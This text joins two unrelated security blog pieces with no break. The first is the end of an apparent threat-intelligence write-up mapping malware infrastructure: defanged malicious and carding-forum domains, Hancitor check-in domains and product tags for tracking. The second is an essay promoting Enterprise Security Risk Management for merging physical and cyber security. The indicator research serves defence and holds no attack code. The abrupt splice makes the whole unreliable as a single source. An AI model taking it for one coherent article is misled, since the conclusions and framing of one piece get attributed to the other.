In addition to domains of that type, there is evidence of other malware distribution being carried out on this infrastructure. Collapsing the collection back down, note the two domains “brontorittoozzo[.]com” and “randomessstioprottoy[.]net” that fall outside of the collection due to more infrastructure connections.
In some of the other smaller clusters, you’ll find groupings of like malicious sites.
For example, there is a group with gems like “premarket[.]ws” like you see below being hosted on this shared infrastructure, which is a forum for less than legal services.
Along with sites like “slilpp[.]ws” which is another less than reputable site as shown below.
Which ironically has a Twitter support account that specifically states the following.
And yet another here below…
There are 632 people happily following along with relatively easy to track down accounts and usernames. A substantial amount of these accounts, on quick review, appear to follow the typical Nigerian cybercrime patterns detailed in other blogs.
Finally, there were multiple clusters of domains used by the Hancitor malware dropper to host the initial check-in and tracking as shown here.
Which can be seen as having been used in a campaign on July 03, 2017 via a post on MTA below.
Conclusion
By pivoting off of one sample we were able to zoom out and identify a sizable infrastructure of what appears to be 707 IPs and 2,611 domains being utilized for malicious activity.
As such, these findings represent a collection of compromised websites, compromised registrar accounts used to spin up subdomains, domains used by malware DGAs, phishing kits, carding forums, malware C2 sites, and a slew of other domains that revolve around criminal activity.
Hopefully this analysis has been helpful in understanding how truly connected some of these infrastructures can be and how with a little digging, you can uncover a substantial amount of operationally useful indicators to protect you and yours.
AutoFocus users can identify and track these threats using the Chthonic, Nymaim, and NotepadInfrastructure tags.
Just a decade ago, as security professionals, we could talk reasonably about physical security and logical security requiring different approaches. Five years ago, we might have found ourselves having conversations about the blurring lines between the two types of security discipline, and could have easily pointed to aspects of both physical and logical security that crossed over each other.
Today? In organizations that have embraced even the least cutting-edge aspects of operational and information technological advances (consumer IoT, industrial IoT, cloud hosted services, etc.), we can no longer rationally discuss a strictly “physical” or “logical” approach to managing security risks to the enterprise.
Quite simply, in a world where:
Every camera and door lock in a facility has an individual IP address
All security investigations must happen in the real and virtual worlds at the same time
Even the most visibly “physical” of protective measures – security officers – are networked via trackers and devices to provide instant information and communication
… there are few, if any, areas left that do not require attention to a holistic and comprehensive view of all security disciplines at once.
What does this mean for the personnel and management teams that are tasked with providing security in this borderless environment? How do we, as practitioners who may have long histories in a single discipline, protect the organization in a security environment where the risks and mitigation tactics have converged, regardless of whether our organizational structures have evolved to match them?
The answer: Enterprise Security Risk Management (ESRM).
ESRM is a risk management model that allows all functional areas tasked with mitigating security risk to operate under a converged philosophy and approach to more efficiently and effectively mitigate security risk across the enterprise, regardless of the physical or logical nature of the asset, or the vector of the potential threat.
Recognizing the Role
ESRM allows security personnel to work together to effectively protect the enterprise from a broad spectrum of security risks by first recognizing that it is the role of the security organization, at root, to manage security risk in conjunction with the business, and to protect assets from harm in line with business tolerance.
The tasks we perform to mitigate risks might be different, but the process of identifying the assets to be protected, recognizing and prioritizing the risks to those assets, and then mitigating the risks to those assets to within acceptable levels of business tolerance, is the same. Take a look at the table below, excerpted from the forthcoming book, Enterprise Security Risk Management: Concepts and Applications (Allen & Loyear, 2017). It shows a quick side-by-side of the kinds of tasks that security groups do, and how they are essentially mitigation responses to the same security risks.
The overarching risks cannot be effectively mitigated by only a single tactical function. Working together, under a common risk management framework, all security personnel can more effectively protect the enterprise environment against security risk.
The Benefits of ESRM and Cross-Functional Risk Management Collaboration
Managing all security risks in partnership and under a common ESRM approach can bring the enterprise significant gains in efficiency and effectiveness, even with multiple groups participating in the security partnership. A few to note include:
Unified security awareness messaging
A partnership approach under an ESRM philosophy allows for the creation of a single, unified security message that includes all facets of security awareness.
Single security point-of-contact
When all security teams operate under the risk-management approach with the same defined processes, any security incident can be reported to a single point in the company and escalated and directed as needed to the appropriate response team.
Operational efficiency
Employees with different skill sets can more easily collaborate on incident response processes.
Information sharing enables cross-department cooperation during security investigations that require both physical and logical forensics.
Streamlined processes save hours and money, allowing diverse security risks to be managed by a single process.
Consolidated metrics reporting to business management save time and effort.
Optimized risk profile
All security risks are identified and managed in an overarching program, making the risk identification and mitigation process more robust and decreasing the potential of overlooked risk.
How Do We Get There?
So, how do we get to the point of converging under a common philosophy, regardless of reporting lines and department structures?
All leaders in the organization with any security responsibilities can align with a risk-management approach by asking themselves:
Does my team have clear risk management goals aligned with business risk tolerance?
Does my team work with other department stakeholders in the risk decision-making process?
Do the members of my team work together with other security teams in situations that cross boundaries of scope?
Am I communicating to all areas of the business that my role, and the role of all other security teams, is to manage security risks holistically?
When all the security functions in the enterprise choose to embrace a risk management – ESRM – approach, the outcome is that:
All security teams follow a formal and consistent process for security risk decision-making.
All security teams follow the same incident response approach, including postmortem investigations and root cause analysis to continually improve the security risk situation of the enterprise.
All security teams work in partnership with one another, ensuring open communications and collaboration across department lines.
All security teams have the transparency, independence, authority and scope needed to do their work in the right way.
All security risks, no matter which team mitigates the risks, are considered part of the holistic security risk management program.
All security teams, no matter who they report to, understand that security risk management is everyone’s role.